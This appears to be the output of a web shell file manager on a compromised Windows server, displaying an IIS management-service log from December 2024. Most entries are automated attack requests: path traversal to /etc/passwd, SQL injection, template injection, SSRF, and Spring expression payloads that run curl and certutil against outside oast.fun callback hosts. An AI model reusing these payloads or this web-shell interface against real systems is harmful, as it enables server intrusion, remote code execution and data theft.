????

Your IP : 216.73.216.152


Current Path : C:/inetpub/logs/wmsvc/W3SVC1/
Upload File :
Current File : C:/inetpub/logs/wmsvc/W3SVC1/ex241214.log

#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-12-14 00:00:06
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-12-14 00:00:06 103.153.214.94 GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.6)+AppleWebKit/616.20+(KHTML,+like+Gecko)+Version/17.1.83+Safari/616.20 - 404 5 0 223
2024-12-14 00:03:52 103.153.214.94 GET /api-third-party/download/extdisks../etc/passwd - 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/127.0.0.0+Safari/537.36 - 404 0 0 223
2024-12-14 00:03:52 103.153.214.94 GET /index.php option=com_graphics&controller=../../../../../../../../../etc/passwd%00 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+11_0_0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/87.0.4280.88+Safari/537.36 - 404 7 0 230
2024-12-14 00:03:52 103.153.214.94 GET /config/asst/system_setPassWordValidate.action/capture_handle.action captureFlag=true&captureCommand=ping%20ctd67t3bclspkptm3qo04yeaconub4jcb.oast.fun%20index.pcap 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64;+rv:121.0)+Gecko/20100101+Firefox/121.0 - 404 7 0 229
2024-12-14 00:04:35 103.153.214.94 GET / cffaction=get_data_from_database&query=SELECT%20*%20from%20wp_users 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4+Safari/605.6.20 - 404 7 0 219
2024-12-14 00:06:23 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64;+rv:128.0)+Gecko/20100101+Firefox/128.0 - 404 7 0 209
2024-12-14 00:06:27 103.153.214.94 GET /darkstat/ - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.2+Safari/605.3.17 - 404 7 0 199
2024-12-14 00:08:12 103.153.214.94 GET /oauth/authorize response_type=${13337*73331}&client_id=acme&scope=openid&redirect_uri=http://test 8172 - 156.251.25.152 Mozilla/5.0+(Fedora;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/121.0.0.0+Safari/537.36 - 404 7 0 206
2024-12-14 00:08:12 103.153.214.94 GET /cities country=/../../../../../../../../etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:109.0)+Gecko/20100101+Firefox/111.0 - 404 7 0 204
2024-12-14 00:08:12 103.153.214.94 GET /nagiosql/admin/info.php key1=%27%20union%20select%20concat(md5(2073688470))%23 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/125.0.0.0+Safari/537.36 - 404 7 0 228
2024-12-14 00:08:13 103.153.214.94 GET /index.php q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5(999999999),11,12,13,14,15,16,17,18,19--+ 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/128.0.0.0+Safari/537.36 - 404 7 0 222
2024-12-14 00:08:17 103.153.214.94 GET /wp-content/plugins/cab-fare-calculator/tblight.php controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.0.1+Safari/605.1.15 - 404 7 0 197
2024-12-14 00:08:53 103.153.214.94 GET /index.php option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd 8172 - 156.251.25.152 Mozilla/5.0+(Knoppix;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 206
2024-12-14 00:08:53 103.153.214.94 GET /Install/InstallWizard.aspx __VIEWSTATE 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 221
2024-12-14 00:08:54 103.153.214.94 GET /arcade.php act=Arcade&do=stats&comment=a&s_id=1' 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.3+Safari/605.1.15 - 404 7 0 219
2024-12-14 00:09:29 103.153.214.94 GET /ipecs-cm/download filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 200
2024-12-14 00:09:32 103.153.214.94 GET /ipecs-cm/download filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg 8172 - 156.251.25.152 Mozilla/5.0+(SS;+Linux+x86_64;+rv:122.0)+Gecko/20100101+Firefox/122.0 - 404 7 0 199
2024-12-14 00:09:38 103.153.214.94 GET /inventory - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.6.25 - 404 7 0 217
2024-12-14 00:09:58 103.153.214.94 GET /backend/admin/users username=anonymous 8172 - 156.251.25.152 Mozilla/5.0+(Debian;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 227
2024-12-14 00:10:02 103.153.214.94 GET / - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:125.0)+Gecko/20100101+Firefox/125.0 - 404 7 0 202
2024-12-14 00:10:25 103.153.214.94 GET /DnnImageHandler.ashx mode=file&url=http://ctd67t3bclspkptm3qo0ij59gjxy5qizi.oast.fun 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 233
2024-12-14 00:12:47 103.153.214.94 GET /MicroStrategyWS/happyaxis.jsp - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+i686;+rv:124.0)+Gecko/20100101+Firefox/124.0 - 404 7 0 225
2024-12-14 00:12:56 103.153.214.94 GET /wp-content/backups-dup-lite/dup-installer/main.installer.php is_daws=1 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686;+rv:126.0)+Gecko/20100101+Firefox/126.0 - 404 7 0 221
2024-12-14 00:12:58 103.153.214.94 GET /hystrix/;a=a/__${T+(java.lang.Runtime).getRuntime().exec("curl+http:/ctd67t3bclspkptm3qo0wodp9esatmyjy.oast.fun")}__::.x/ - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Version/4.0+Chrome/85.0.4183.127+Safari/537.36 - 400 0 0 230
2024-12-14 00:12:58 103.153.214.94 GET /wp-content/dup-installer/main.installer.php is_daws=1 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_11_6)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/103.0.0.0+Safari/537.36 - 404 7 0 235
2024-12-14 00:13:00 103.153.214.94 GET /hystrix/;a=a/__${T+(java.lang.Runtime).getRuntime().exec("certutil+-urlcache+-split+-f+http:/ctd67t3bclspkptm3qo06xjwzm5ioi7oc.oast.fun")}__::.x/ - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/52.0.2743.82+Safari/537.36 - 400 0 0 237
2024-12-14 00:14:29 103.153.214.94 GET /artemis/env - 8172 - 156.251.25.152 Mozilla/5.0+(X11;+CrOS+x86_64+14541.0.0)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/126.0.0.0+Safari/537.36 - 404 7 0 200
2024-12-14 00:14:30 103.153.214.94 GET /artemis-portal/artemis/env - 8172 - 156.251.25.152 Mozilla/5.0+(ZZ;+Linux+i686)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/118.0.0.0+Safari/537.36 - 404 7 0 200
2024-12-14 00:14:30 103.153.214.94 GET /artemis/actuator/env - 8172 - 156.251.25.152 Mozilla/5.0+(Ubuntu;+Linux+x86_64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/123.0.0.0+Safari/537.36 - 404 7 0 201
2024-12-14 00:14:31 103.153.214.94 GET /artemis;/env; - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/16.3+Safari/605.1.15 - 404 7 0 199
2024-12-14 00:14:31 103.153.214.94 GET /artemis/1/..;/env - 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+10_15_7)+AppleWebKit/605.1.15+(KHTML,+like+Gecko)+Version/17.4.1+Safari/605.4.24 - 404 5 0 211
2024-12-14 00:15:17 103.153.214.94 GET /verify.php id=1&confirm_hash 8172 - 156.251.25.152 Mozilla/5.0+(Macintosh;+Intel+Mac+OS+X+14.1)+AppleWebKit/618.27+(KHTML,+like+Gecko)+Version/17.4+Safari/618.27 - 404 7 0 199
2024-12-14 00:15:19 103.153.214.94 GET /mantis/verify.php id=1&confirm_hash 8172 - 156.251.25.152 Mozilla/5.0+(Kubuntu;+Linux+i686;+rv:123.0)+Gecko/20100101+Firefox/123.0 - 404 7 0 203
2024-12-14 00:15:19 103.153.214.94 GET /mantisBT/verify.php id=1&confirm_hash 8172 - 156.251.25.152 Mozilla/5.0+(CentOS;+Linux+x86_64;+rv:127.0)+Gecko/20100101+Firefox/127.0 - 404 7 0 220
2024-12-14 00:15:20 103.153.214.94 GET /mantisbt-2.3.0/verify.php id=1&confirm_hash 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64)+AppleWebKit/537.36+(KHTML,+like+Gecko)+Chrome/42.0.2311.135+Safari/537.36+Edge/12.10240 - 404 7 0 236
2024-12-14 00:15:20 103.153.214.94 GET /bugs/verify.php confirm_hash&id=1 8172 - 156.251.25.152 Mozilla/5.0+(Windows+NT+10.0;+Win64;+x64;+rv:106.0)+Gecko/20100101+Firefox/106.0 - 404 7 0 225
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-12-14 04:02:25
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-12-14 04:02:24 103.153.214.94 GET / - 8172 - 35.203.211.203 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 299
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-12-14 14:05:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-12-14 14:05:00 103.153.214.94 GET / - 8172 - 162.216.150.244 Expanse,+a+Palo+Alto+Networks+company,+searches+across+the+global+IPv4+space+multiple+times+per+day+to+identify+customers'+presences+on+the+Internet.+If+you+would+like+to+be+excluded+from+our+scans,+please+send+IP+addresses/domains+to:+scaninfo@paloaltonetworks.com - 404 7 0 285
#Software: Microsoft Internet Information Services 10.0
#Version: 1.0
#Date: 2024-12-14 16:24:56
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) cs(Referer) sc-status sc-substatus sc-win32-status time-taken
2024-12-14 16:24:56 103.153.214.94 GET / - 8172 - 206.168.34.221 Mozilla/5.0+(compatible;+CensysInspect/1.1;++https://about.censys.io/) - 404 7 0 256